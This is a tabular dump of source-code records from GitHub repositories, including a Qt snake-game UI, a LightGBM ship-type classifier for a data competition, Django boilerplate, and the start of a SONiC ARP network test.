blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
69ca0c8da13ad6bf070afc74b5c3967a6a1dff38
|
f29a90f22565d52a5c6376e96d45697cedf90506
|
/snakes_graphic.py
|
21e52880749d7ae0b10fdd8803bba7af7f03f4dc
|
[] |
no_license
|
jczapiew/hexadecimal-snake
|
e2d0ca1566d70bcb7e57b126e7cdabd8a55d3572
|
cb1e36eda559c683d4261cbe26eac745bc67ee04
|
refs/heads/main
| 2023-02-24T00:18:43.082402
| 2021-02-03T11:55:43
| 2021-02-03T11:55:43
| 324,958,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,884
|
py
|
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'snakes_GUI.ui'
##
## Created by: Qt User Interface Compiler version 5.14.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (QCoreApplication, QDate, QDateTime, QMetaObject,
QObject, QPoint, QRect, QSize, QTime, QUrl, Qt)
from PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont,
QFontDatabase, QIcon, QKeySequence, QLinearGradient, QPalette, QPainter,
QPixmap, QRadialGradient)
from PySide2.QtWidgets import *
class Ui_Snakes(object):
def setupUi(self, Snakes):
if not Snakes.objectName():
Snakes.setObjectName(u"Snakes")
Snakes.resize(821, 546)
self.centralwidget = QWidget(Snakes)
self.centralwidget.setObjectName(u"centralwidget")
self.exitButton = QPushButton(self.centralwidget)
self.exitButton.setObjectName(u"exitButton")
self.exitButton.setGeometry(QRect(750, 10, 61, 51))
self.startButton = QPushButton(self.centralwidget)
self.startButton.setObjectName(u"startButton")
self.startButton.setGeometry(QRect(660, 80, 71, 41))
self.onePlayer = QPushButton(self.centralwidget)
self.onePlayer.setObjectName(u"onePlayer")
self.onePlayer.setGeometry(QRect(650, 20, 41, 21))
self.playersLabel = QLabel(self.centralwidget)
self.playersLabel.setObjectName(u"playersLabel")
self.playersLabel.setGeometry(QRect(650, 0, 101, 21))
self.twoPlayers = QPushButton(self.centralwidget)
self.twoPlayers.setObjectName(u"twoPlayers")
self.twoPlayers.setGeometry(QRect(700, 20, 41, 21))
self.resetButton = QPushButton(self.centralwidget)
self.resetButton.setObjectName(u"resetButton")
self.resetButton.setGeometry(QRect(740, 80, 71, 41))
self.pauseButton = QPushButton(self.centralwidget)
self.pauseButton.setObjectName(u"pauseButton")
self.pauseButton.setGeometry(QRect(660, 130, 71, 41))
self.playerOnePoints = QTextEdit(self.centralwidget)
self.playerOnePoints.setObjectName(u"playerOnePoints")
self.playerOnePoints.setGeometry(QRect(660, 270, 51, 31))
self.pointsLabel = QLabel(self.centralwidget)
self.pointsLabel.setObjectName(u"pointsLabel")
self.pointsLabel.setGeometry(QRect(710, 230, 31, 21))
self.playerOnePointsLabel = QLabel(self.centralwidget)
self.playerOnePointsLabel.setObjectName(u"playerOnePointsLabel")
self.playerOnePointsLabel.setGeometry(QRect(670, 250, 39, 13))
self.playerTwoPointsLabel = QLabel(self.centralwidget)
self.playerTwoPointsLabel.setObjectName(u"playerTwoPointsLabel")
self.playerTwoPointsLabel.setGeometry(QRect(730, 250, 39, 13))
self.playerTwoPoints = QTextEdit(self.centralwidget)
self.playerTwoPoints.setObjectName(u"playerTwoPoints")
self.playerTwoPoints.setGeometry(QRect(730, 270, 51, 31))
self.textEdit = QTextEdit(self.centralwidget)
self.textEdit.setObjectName(u"textEdit")
self.textEdit.setGeometry(QRect(660, 310, 141, 131))
self.graphicsView = QGraphicsView(self.centralwidget)
self.graphicsView.setObjectName(u"graphicsView")
self.graphicsView.setGeometry(QRect(0, 0, 641, 501))
self.button_multiplayer = QPushButton(self.centralwidget)
self.button_multiplayer.setObjectName(u"button_multiplayer")
self.button_multiplayer.setGeometry(QRect(670, 480, 121, 23))
self.lineEdit = QLineEdit(self.centralwidget)
self.lineEdit.setObjectName(u"lineEdit")
self.lineEdit.setGeometry(QRect(650, 450, 111, 20))
self.lineEdit_2 = QLineEdit(self.centralwidget)
self.lineEdit_2.setObjectName(u"lineEdit_2")
self.lineEdit_2.setGeometry(QRect(760, 450, 41, 20))
self.replayButton = QPushButton(self.centralwidget)
self.replayButton.setObjectName(u"replayButton")
self.replayButton.setGeometry(QRect(740, 130, 71, 41))
self.savejsonButton = QPushButton(self.centralwidget)
self.savejsonButton.setObjectName(u"savejsonButton")
self.savejsonButton.setGeometry(QRect(660, 180, 71, 41))
self.readjsonButton = QPushButton(self.centralwidget)
self.readjsonButton.setObjectName(u"readjsonButton")
self.readjsonButton.setGeometry(QRect(740, 180, 71, 41))
self.botButton = QPushButton(self.centralwidget)
self.botButton.setObjectName(u"botButton")
self.botButton.setGeometry(QRect(660, 50, 75, 23))
Snakes.setCentralWidget(self.centralwidget)
self.menubar = QMenuBar(Snakes)
self.menubar.setObjectName(u"menubar")
self.menubar.setGeometry(QRect(0, 0, 821, 21))
Snakes.setMenuBar(self.menubar)
self.statusbar = QStatusBar(Snakes)
self.statusbar.setObjectName(u"statusbar")
Snakes.setStatusBar(self.statusbar)
self.retranslateUi(Snakes)
QMetaObject.connectSlotsByName(Snakes)
# setupUi
def retranslateUi(self, Snakes):
Snakes.setWindowTitle(QCoreApplication.translate("Snakes", u"MainWindow", None))
self.exitButton.setText(QCoreApplication.translate("Snakes", u"Exit", None))
self.startButton.setText(QCoreApplication.translate("Snakes", u"Start", None))
self.onePlayer.setText(QCoreApplication.translate("Snakes", u"1", None))
self.playersLabel.setText(QCoreApplication.translate("Snakes", u"Number of players:", None))
self.twoPlayers.setText(QCoreApplication.translate("Snakes", u"2", None))
self.resetButton.setText(QCoreApplication.translate("Snakes", u"Reset", None))
self.pauseButton.setText(QCoreApplication.translate("Snakes", u"Pause", None))
self.pointsLabel.setText(QCoreApplication.translate("Snakes", u"Points", None))
self.playerOnePointsLabel.setText(QCoreApplication.translate("Snakes", u"Player 1", None))
self.playerTwoPointsLabel.setText(QCoreApplication.translate("Snakes", u"Player 2", None))
self.button_multiplayer.setText(QCoreApplication.translate("Snakes", u"Multiplayer", None))
self.replayButton.setText(QCoreApplication.translate("Snakes", u"Replay", None))
self.savejsonButton.setText(QCoreApplication.translate("Snakes", u"Save json", None))
self.readjsonButton.setText(QCoreApplication.translate("Snakes", u"Read json", None))
self.botButton.setText(QCoreApplication.translate("Snakes", u"vs. AI", None))
# retranslateUi
|
[
"noreply@github.com"
] |
jczapiew.noreply@github.com
|
55d630b6adfebc10d5918651f00a55fd63835aa9
|
6b1356bd758b656d2afa119f0c2d0f399d157a0b
|
/model.py
|
3e713292b834e18f3f7c4444f039dd6151ab326f
|
[] |
no_license
|
Ai-Light/2020-zhihuihaiyang
|
87f22b8e94a0424b090e2f15be2047912fbdd7ce
|
0d775d8611339299a5eea2b94d4efe8ef3996977
|
refs/heads/master
| 2022-08-10T02:22:35.457007
| 2020-05-18T13:55:01
| 2020-05-18T13:55:01
| 253,509,618
| 37
| 12
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,125
|
py
|
#!/usr/bin/env python
# coding: utf-8
import gc
import pandas as pd
import numpy as np
import os
import time
import lightgbm as lgb
from copy import deepcopy
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import f1_score
from sklearn import metrics
from sklearn.metrics import precision_recall_fscore_support
import warnings
from glob import glob
from scipy.sparse import csr_matrix
start_t = time.time()
print('ww_900_start')
pd.set_option('display.max_columns', 100)
warnings.filterwarnings('ignore')
def group_feature(df, key, target, aggs,flag):
agg_dict = {}
for ag in aggs:
agg_dict['{}_{}_{}'.format(target,ag,flag)] = ag
print(agg_dict)
t = df.groupby(key)[target].agg(agg_dict).reset_index()
return t
def haversine_dist(lat1,lng1,lat2,lng2):
lat1, lng1, lat2, lng2 = map(np.radians, (lat1, lng1, lat2, lng2))
radius = 6371 # Earth's radius taken from google
lat = lat2 - lat1
lng = lng2 - lng1
d = np.sin(lat/2) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(lng/2) ** 2
h = 2 * radius * np.arcsin(np.sqrt(d))
return h
def extract_feature(df, train, flag):
# # speed split
# date_nunique = df.groupby(['ship'])['speed_cat'].nunique().to_dict()
# train['speed_cat_nunique'] = train['ship'].map(date_nunique)
'''
统计feature
'''
if (flag == 'on_night') or (flag == 'on_day'):
t = group_feature(df, 'ship','speed',['max','mean','median','std','skew'],flag)
train = pd.merge(train, t, on='ship', how='left')
# return train
if flag == "0":
t = group_feature(df, 'ship','direction',['max','median','mean','std','skew'],flag)
train = pd.merge(train, t, on='ship', how='left')
elif flag == "1":
t = group_feature(df, 'ship','speed',['max','mean','median','std','skew'],flag)
train = pd.merge(train, t, on='ship', how='left')
t = group_feature(df, 'ship','direction',['max','median','mean','std','skew'],flag)
train = pd.merge(train, t, on='ship', how='left')
hour_nunique = df.groupby('ship')['speed'].nunique().to_dict()
train['speed_nunique_{}'.format(flag)] = train['ship'].map(hour_nunique)
hour_nunique = df.groupby('ship')['direction'].nunique().to_dict()
train['direction_nunique_{}'.format(flag)] = train['ship'].map(hour_nunique)
t = group_feature(df, 'ship','x',['max','min','mean','median','std','skew'],flag)
train = pd.merge(train, t, on='ship', how='left')
t = group_feature(df, 'ship','y',['max','min','mean','median','std','skew'],flag)
train = pd.merge(train, t, on='ship', how='left')
t = group_feature(df, 'ship','base_dis_diff',['max','min','mean','std','skew'],flag)
train = pd.merge(train, t, on='ship', how='left')
train['x_max_x_min_{}'.format(flag)] = train['x_max_{}'.format(flag)] - train['x_min_{}'.format(flag)]
train['y_max_y_min_{}'.format(flag)] = train['y_max_{}'.format(flag)] - train['y_min_{}'.format(flag)]
train['y_max_x_min_{}'.format(flag)] = train['y_max_{}'.format(flag)] - train['x_min_{}'.format(flag)]
train['x_max_y_min_{}'.format(flag)] = train['x_max_{}'.format(flag)] - train['y_min_{}'.format(flag)]
train['slope_{}'.format(flag)] = train['y_max_y_min_{}'.format(flag)] / np.where(train['x_max_x_min_{}'.format(flag)]==0, 0.001, train['x_max_x_min_{}'.format(flag)])
train['area_{}'.format(flag)] = train['x_max_x_min_{}'.format(flag)] * train['y_max_y_min_{}'.format(flag)]
# train['dis_lng_{}'.format(flag)] = list(map(haversine_dist,train['x_max_{}'.format(flag)],train['y_max_{}'.format(flag)],train['x_min_{}'.format(flag)],train['y_min_{}'.format(flag)]))
mode_hour = df.groupby('ship')['hour'].agg(lambda x:x.value_counts().index[0]).to_dict()
train['mode_hour_{}'.format(flag)] = train['ship'].map(mode_hour)
train['slope_median_{}'.format(flag)] = train['y_median_{}'.format(flag)] / np.where(train['x_median_{}'.format(flag)]==0, 0.001, train['x_median_{}'.format(flag)])
return train
def get_data(files, is_sort=True, sort_column="time"):
datas = [pd.read_csv(f) for f in files]
if is_sort:
dfs = [df.sort_values(by=sort_column, ascending=True, na_position='last') for df in datas]
df = pd.concat(datas, axis=0, ignore_index=True)
return df
def extract_dt(df):
df['time'] = pd.to_datetime(df['time'], format='%m%d %H:%M:%S')
df['date'] = df['time'].dt.date
df['hour'] = df['time'].dt.hour
df['x_dis_diff'] = (df['x'] - 6165599).abs()
df['y_dis_diff'] = (df['y'] - 5202660).abs()
df['base_dis_diff'] = ((df['x_dis_diff']**2)+(df['y_dis_diff']**2))**0.5
del df['x_dis_diff'],df['y_dis_diff']
df["x"] = df["x"] / 1e6
df["y"] = df["y"] / 1e6
df['day_nig'] = 0
df.loc[(df['hour'] > 5) & (df['hour'] < 20),'day_nig'] = 1
return df
train_files = glob("tcdata/hy_round2_train_20200225/*.csv")
test_files = glob("tcdata/hy_round2_testB_20200312/*.csv")
train_files = sorted(train_files)
test_files = sorted(test_files)
def get_data(files, is_sort=True, sort_column="time"):
datas = [pd.read_csv(f) for f in files]
if is_sort:
dfs = [df.sort_values(by=sort_column, ascending=True, na_position='last') for df in datas]
df = pd.concat(datas, axis=0, ignore_index=True)
return df
train = get_data(train_files)
train.columns = ['ship','x','y','speed','direction','time','type']
test = get_data(test_files)
test.columns = ['ship','x','y','speed','direction','time']
train = extract_dt(train)
test = extract_dt(test)
train_label = train.drop_duplicates(['ship'],keep = 'first')
test_label = test.drop_duplicates(['ship'],keep = 'first')
train_label['type'] = train_label['type'].map({'围网':0,'刺网':1,'拖网':2})
num = train_label.shape[0]
data_label = train_label.append(test_label)
data =train.append(test)
data_1 = data[data['speed']==0]
data_2 = data[data['speed']!=0]
data_label = extract_feature(data_1, data_label,"0")
data_label = extract_feature(data_2, data_label,"1")
data_1 = data[data['day_nig'] == 0]
data_2 = data[data['day_nig'] == 1]
data_label = extract_feature(data_1, data_label,"on_night")
data_label = extract_feature(data_2, data_label,"on_day")
if os.path.isfile('nmf_testb.csv'):
nmf_fea = pd.read_csv('nmf_testb.csv')
data_label = data_label.merge(nmf_fea,on='ship',how = 'left')
del nmf_fea
else:
for j in range(1,4):
print('********* {} *******'.format(j))
for i in ['speed','x','y']:
data[i + '_str'] = data[i].astype(str)
from nmf_list import nmf_list
nmf = nmf_list(data,'ship',i + '_str',8,2)
nmf_a = nmf.run(j)
data_label = data_label.merge(nmf_a,on = 'ship',how = 'left')
first = "0"
second = "1"
data_label['direction_median_ratio'] = data_label['direction_median_{}'.format(second)] / data_label['direction_median_{}'.format(first)]
data_label['slope_ratio'] = data_label['slope_{}'.format(second)] / data_label['slope_{}'.format(first)]
data_label['slope_mean_ratio'] = data_label['slope_median_{}'.format(second)] / data_label['slope_median_{}'.format(first)]
first = "on_night"
second = "on_day"
data_label['speed_median_ratio'] = data_label['speed_median_{}'.format(second)] / data_label['speed_median_{}'.format(first)]
data_label['speed_std_ratio'] = data_label['speed_std_{}'.format(second)] / data_label['speed_std_{}'.format(first)]
# data_label['lat_lng_ratio'] = data_label['dis_lng_{}'.format(second)] / data_label['dis_lng_{}'.format(first)]
'''
count feature
'''
flag = 'all'
for cc in ['direction','speed']:
t = group_feature(data_label,cc, 'ship',['count'],flag +cc+ 'x')
data_label = pd.merge(data_label, t, on=cc, how='left')
for i in ["0","1"]:
if i == "1":
for j in [
# 'slope_speed_cat_nunique_{}'.format(i),
# 'slope_mean_speed_cat_nunique_{}'.format(i),
'speed_nunique_{}'.format(i),
'direction_nunique_{}'.format(i)
]:
t = group_feature(data_label,j, 'ship',['count'],j+"_count")
data_label = pd.merge(data_label, t, on=j, how='left')
for j in [
'slope_median_{}'.format(i),
# 'x_max_x_min_{}'.format(i),
# 'y_max_y_min_{}'.format(i)
]:
# t = group_feature(data_label,j, 'ship',['count'],j+"_count")
# data_label = pd.merge(data_label, t, on=j, how='left')
t = group_feature(data_label,j, 'speed',['min','max','median','std','skew'],j+"_tongji")
data_label = pd.merge(data_label, t, on=j, how='left')
# t = group_feature(data_label,j, 'direction',['min','max','median','std','skew'],j+"_tongji")
# data_label = pd.merge(data_label, t, on=j, how='left')
def cut_bins(raw_data, col_name=None, q=49):
features, bins = pd.qcut(raw_data[col_name], q=q, retbins=True, duplicates="drop")
labels = list(range(len(bins) - 1))
features, bins = pd.qcut(raw_data[col_name], labels=labels, q=q, retbins=True, duplicates="drop")
return features, bins, labels
MAX_CATE = 199
data["x_cate"], x_bins, x_labels = cut_bins(data, col_name="x", q=MAX_CATE)
data["y_cate"], y_bins, y_labels = cut_bins(data, col_name="y", q=MAX_CATE)
# data["x_sub_y_cate"], x_sub_y_bins, x_sub_y_labels = cut_bins(data, col_name="x_sub_y", q=MAX_CATE)
data["distance_cate"], dist_bins, dist_labels = cut_bins(data, col_name="base_dis_diff", q=MAX_CATE)
data["speed_cate"], speed_bins, speed_labels = cut_bins(data, col_name="speed", q=MAX_CATE)
MAX_CATE = 120
data["direct_cate"], speed_bins, speed_labels = cut_bins(data, col_name="direction", q=MAX_CATE)
if os.path.isfile('emb_testb.csv'):
w2v_fea = pd.read_csv('emb_testb.csv')
data_label = data_label.merge(w2v_fea, on='ship', how='left')
del w2v_fea
else:
from gensim.models import Word2Vec
import gc
def emb(df, f1, f2):
emb_size = 23
print('====================================== {} {} ======================================'.format(f1, f2))
tmp = df.groupby(f1, as_index=False)[f2].agg({'{}_{}_list'.format(f1, f2): list})
sentences = tmp['{}_{}_list'.format(f1, f2)].values.tolist()
del tmp['{}_{}_list'.format(f1, f2)]
for i in range(len(sentences)):
sentences[i] = [str(x) for x in sentences[i]]
model = Word2Vec(sentences, size=emb_size, window=5, min_count=3, sg=0, hs=1, seed=2222)
emb_matrix = []
for seq in sentences:
vec = []
for w in seq:
if w in model:
vec.append(model[w])
if len(vec) > 0:
emb_matrix.append(np.mean(vec, axis=0))
else:
emb_matrix.append([0] * emb_size)
emb_matrix = np.array(emb_matrix)
for i in range(emb_size):
tmp['{}_{}_emb_{}'.format(f1, f2, i)] = emb_matrix[:, i]
del model, emb_matrix, sentences
return tmp
emb_cols = [
['ship', 'x_cate'],
['ship', 'y_cate'],
['ship', 'speed_cate'],
['ship', 'distance_cate'],
# ['ship', 'direct_cate'],
]
for f1, f2 in emb_cols:
data_label = data_label.merge(emb(data, f1, f2), on=f1, how='left')
gc.collect()
# emb_list = ['ship']
# for i in data_label.columns:
# if '_emb_' in i:
# emb_list.append(i)
# data_label[emb_list].to_csv('emb_testb.csv',index=False)
print('feature done')
train_label = data_label[:num]
test_label = data_label[num:]
features = [x for x in train_label.columns if x not in ['ship','type','time','x','y','diff_time','date','day_nig','direction','speed','hour',
'speed_many','dire_diff','direction_str','speed_str','dis','x_speed','y_speed'] ]
target = 'type'
# print(len(features), ','.join(features))
from feature_selector import FeatureSelector
fs = FeatureSelector(data = train_label[features], labels = train_label[target])
fs.identify_zero_importance(task = 'classification', eval_metric = 'multiclass',
n_iterations = 10, early_stopping = True)
fs.identify_low_importance(cumulative_importance = 0.97)
low_importance_features = fs.ops['low_importance']
print('====low_importance_features=====')
print(low_importance_features)
for i in low_importance_features:
features.remove(i)
print('feature number',len(features))
gc.collect()
def macro_f1(y_hat, data):
y_true = data.get_label()
y_hat = y_hat.reshape(-1, y_true.shape[0])
y_hat = np.argmax(y_hat, axis=0)
f1_multi = precision_recall_fscore_support(y_true, y_hat, labels=[0, 1, 2])[2]
f1_macro = f1_score(y_true, y_hat, average ="macro")
assert np.mean(f1_multi) == f1_macro
return 'f1', f1_macro, True
def f1_single(y_hat, data, index=0):
y_true = data.get_label()
y_hat = y_hat.reshape(-1, y_true.shape[0])
y_hat = np.argmax(y_hat, axis=0)
f1_multi = precision_recall_fscore_support(y_true, y_hat, labels=[0, 1, 2])[2]
f1_s = round(f1_multi[index], 4)
return 'f1_{}'.format(index), f1_s, True
train_X = train_label[features]
test_X = test_label[features]
print(train_X.shape, test_X.shape)
train_y = train_label[target]
params = {
'task':'train',
'num_leaves': 63,
'objective': 'multiclass',
'num_class': 3,
'metric': 'None', # [f1_0, f1_1, f1_2],
'min_data_in_leaf': 10,
'learning_rate': 0.01,
'feature_fraction': 0.7,
'bagging_fraction': 0.95,
'early_stopping_rounds': 2000,
# 'lambda_l1': 0.1,
# 'lambda_l2': 0.1,
"first_metric_only": True,
'bagging_freq': 3,
'max_bin': 255,
'random_state': 42,
'verbose' : -1
}
models = []
test_preds = []
val_preds = []
oof_seed = np.zeros((len(train_label), 3))
seed = [2222,2018778]
for j in seed:
print("+++++++++++++++++ seed {} ++++++++++++".format(str(j)))
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=j)
oof = np.zeros((len(train_label), 3))
for i, (trn_idx, val_idx) in enumerate(skf.split(train_X, train_y)):
print("-" * 81)
print("[!] fold {}".format(i))
lgb_params = deepcopy(params)
# print(lgb_params)
trn_X = csr_matrix(train_X)[trn_idx]
trn_y = train_y.iloc[trn_idx]
val_X = csr_matrix(train_X)[val_idx]
val_y = train_y.iloc[val_idx]
dtrain = lgb.Dataset(trn_X, trn_y)
dval = lgb.Dataset(val_X, val_y)
model = lgb.train(lgb_params,
dtrain,
num_boost_round=400000,
valid_sets=[dval],
feval=lambda preds, train_data: [
macro_f1(preds, train_data),
f1_single(preds, train_data, index=0),
f1_single(preds, train_data, index=1),
f1_single(preds, train_data, index=2)],
verbose_eval=-1)
models.append(model)
# print(model.best_iteration)
val_pred = model.predict(val_X, iteration=model.best_iteration)
oof[val_idx] = val_pred
val_y = train_y.iloc[val_idx]
val_pred = np.argmax(val_pred, axis=1)
print(str(i), 'val f1', metrics.f1_score(val_y, val_pred, average='macro'))
test_preds.append(model.predict(test_X, iteration=model.best_iteration))
print("[!] fold {} finish\n".format(i))
del dtrain, dval
gc.collect()
val_pred = np.argmax(oof, axis=1)
print(str(j), 'every_flod val f1', metrics.f1_score(train_y, val_pred, average='macro'))
oof_seed += oof/len(seed)
oof1 = np.argmax(oof_seed, axis=1)
print('oof f1', metrics.f1_score(oof1,train_y, average='macro'))
val_score = np.round(metrics.f1_score(oof1, train_y, average='macro'),6)
def ensemble_predictions(predictions, weights=None, type_="linear"):
if not weights:
print("[!] AVE_WGT")
weights = [1./ len(predictions) for _ in range(len(predictions))]
assert len(predictions) == len(weights)
if np.sum(weights) != 1.0:
weights = [w / np.sum(weights) for w in weights]
print("[!] weights = {}".format(weights))
assert np.isclose(np.sum(weights), 1.0)
if type_ == "linear":
res = np.average(predictions, weights=weights, axis=0)
elif type_ == "harmonic":
res = np.average([1 / p for p in predictions], weights=weights, axis=0)
return 1 / res
elif type_ == "geometric":
numerator = np.average(
[np.log(p) for p in predictions], weights=weights, axis=0
)
res = np.exp(numerator / sum(weights))
return res
elif type_ == "rank":
from scipy.stats import rankdata
res = np.average([rankdata(p) for p in predictions], weights=weights, axis=0)
return res / (len(res) + 1)
return res
def merge(prob, number=-1, index=0):
from copy import deepcopy
new_prob = deepcopy(prob)
top = np.argsort(prob[:, index])[::-1][: number]
print(top[: 4])
for i in range(len(new_prob)):
pad_value = np.array([0, 0, 0])
pad_value[index] = 1
if i in top:
new_prob[i, ] = pad_value
else:
new_prob[i, index] = 0.
return new_prob
test_pred_prob = ensemble_predictions(test_preds)
test_pred = test_pred_prob.argmax(axis=1)
test_pro = test_label[['ship']]
test_pro['pro_1'] = test_pred_prob[:,0]
test_pro['pro_2'] = test_pred_prob[:,1]
test_pro['pro_3'] = test_pred_prob[:,2]
pred_pro = merge(test_pro[['pro_1', 'pro_2', 'pro_3']].values, 900,0)
test_pred = pred_pro.argmax(axis=1)
test_data = test_label[['ship']]
test_data["label"] = test_pred
test_data["label"] = test_data["label"].map({0:'围网',1:'刺网',2:'拖网'})
# test_data['label'][:100] = '刺网'
test_data[["ship", "label"]].to_csv("result.csv", index=False, header=None)
print(test_data["label"].value_counts())
print('runtime:', time.time() - start_t)
|
[
"noreply@github.com"
] |
Ai-Light.noreply@github.com
|
c5e15319375d53d408d835b740d2eddf5d4338d0
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03943/s886039184.py
|
47e4a54633be998205df0d5ac0a15eb3b2b0a5f8
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
import sys
def LI(): return list(map(int,sys.stdin.readline().rstrip().split())) #空白あり
A = LI()
A.sort()
if A[0]+A[1] == A[2]:
print('Yes')
else:
print('No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
eba509e44d06b1eb0943933b603132d04b06598a
|
acd7c5edd5e56e813d5c54c1aa1f894126fdbd01
|
/URLStatusChecker/asgi.py
|
da15c6d089184e3b55a141fd2b6ce1add8246345
|
[] |
no_license
|
Iron-Cow/URL-Status-Checker
|
1c8814bf057eb5bb9f3e31e812ef238267bcc997
|
b3ef5084b817768acf51dcfaeac1432d758a76d9
|
refs/heads/master
| 2022-04-17T01:10:17.581087
| 2020-04-11T18:18:28
| 2020-04-11T18:18:28
| 254,927,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
ASGI config for URLStatusChecker project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'URLStatusChecker.settings')
application = get_asgi_application()
|
[
"uangeji@gmail.com"
] |
uangeji@gmail.com
|
b793faa9165095235e90f66c5a02acc7c6138f08
|
65b421d994a14d26ed906d35d563d4de010ec99e
|
/game/factories/__init__.py
|
014e7b8f9404a38846c12df7c7bec09b72be95b2
|
[] |
no_license
|
ManickYoj/Ludus
|
a7c4b7371cb6b8b459ade950c50c5ec3f4d3b056
|
6b57f787aaa8bd72044e6632d28acfed1c4a1903
|
refs/heads/master
| 2021-01-01T20:21:40.484854
| 2017-08-27T05:37:14
| 2017-08-27T05:37:14
| 98,823,596
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
"""
Factory Loader
This gnarly script walks through the factory directory and
loads each factory into the factory module namespace so that we
can eg. `from factory import PlayerFactory` rather than the more
verbose `from factory.player import PlayerFactory`.
"""
import pkgutil
import inspect
__all__ = []
for loader, name, is_pkg in pkgutil.walk_packages(__path__):
module = loader.find_module(name).load_module(name)
for name, value in inspect.getmembers(module):
if name.startswith(('__', '_')):
continue
globals()[name] = value
__all__.append(name)
|
[
"nickfrancisci@gmail.com"
] |
nickfrancisci@gmail.com
|
1f03e2319d271e48b8e3dfebfaa31c9bf70a2cfd
|
be7f74cb434d1e1de9fb4c9417fec473db101844
|
/lecturer/admin.py
|
a65de3345090043f9d2c7b0b42e74860276da569
|
[] |
no_license
|
belloshehu/academics
|
acd1bb690376debdc4309a12d5195f2e34713361
|
aff02861204cfa4580a59dc11a8d28154216710e
|
refs/heads/master
| 2023-07-20T13:55:53.588174
| 2021-08-22T10:02:11
| 2021-08-22T10:02:11
| 326,049,728
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from django.contrib import admin
from .models import Lecturer
admin.site.register(Lecturer)
|
[
"belloshehu1@gmail.com"
] |
belloshehu1@gmail.com
|
42b078cdb0424dff4b849e9f742b188755830fbb
|
8e0b9b63771dfc0e9dcef35d86da5c750f1d1dc6
|
/tests/arp/test_arpall.py
|
bc67c2f500872517725f37628243628e428c8b21
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
status110/sonic-mgmt
|
95f73502c602902c01c985f0639a2dcad2826d03
|
ffb090240cfbffdaa2079ee8d5a564902e21858a
|
refs/heads/master
| 2023-01-13T10:12:52.177961
| 2020-11-12T04:18:38
| 2020-11-12T04:18:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,099
|
py
|
import logging
import pytest
import time
from datetime import datetime
from tests.ptf_runner import ptf_runner
from tests.common.helpers.assertions import pytest_assert
from tests.common import config_reload
pytestmark = [
pytest.mark.topology('t1')
]
logger = logging.getLogger(__name__)
def collect_info(duthost):
if duthost.facts['asic_type'] == "mellanox":
logger.info('************* Collect information for debug *************')
duthost.shell('ip link')
duthost.shell('ip addr')
duthost.shell('grep . /sys/class/net/Ethernet*/address', module_ignore_errors=True)
duthost.shell('grep . /sys/class/net/PortChannel*/address', module_ignore_errors=True)
@pytest.fixture(scope="module")
def common_setup_teardown(duthost, ptfhost):
mg_facts = duthost.minigraph_facts(host=duthost.hostname)['ansible_facts']
int_facts = duthost.interface_facts()['ansible_facts']
ports = list(sorted(mg_facts['minigraph_ports'].keys(), key=lambda item: int(item.replace('Ethernet', ''))))
# Select port index 0 & 1 two interfaces for testing
intf1 = ports[0]
intf2 = ports[1]
logger.info("Selected ints are {0} and {1}".format(intf1, intf2))
intf1_indice = mg_facts['minigraph_port_indices'][intf1]
intf2_indice = mg_facts['minigraph_port_indices'][intf2]
po1 = get_po(mg_facts, intf1)
po2 = get_po(mg_facts, intf2)
try:
# Make sure selected interfaces are not in portchannel
if po1 is not None:
duthost.shell('config portchannel member del {0} {1}'.format(po1, intf1))
collect_info(duthost)
duthost.shell('config interface startup {0}'.format(intf1))
collect_info(duthost)
if po2 is not None:
duthost.shell('config portchannel member del {0} {1}'.format(po2, intf2))
collect_info(duthost)
duthost.shell('config interface startup {0}'.format(intf2))
collect_info(duthost)
# Change SONiC DUT interface IP to test IP address
duthost.shell('config interface ip add {0} 10.10.1.2/28'.format(intf1))
collect_info(duthost)
duthost.shell('config interface ip add {0} 10.10.1.20/28'.format(intf2))
collect_info(duthost)
if (po1 is not None) or (po2 is not None):
time.sleep(40)
# Copy test files
ptfhost.copy(src="ptftests", dest="/root")
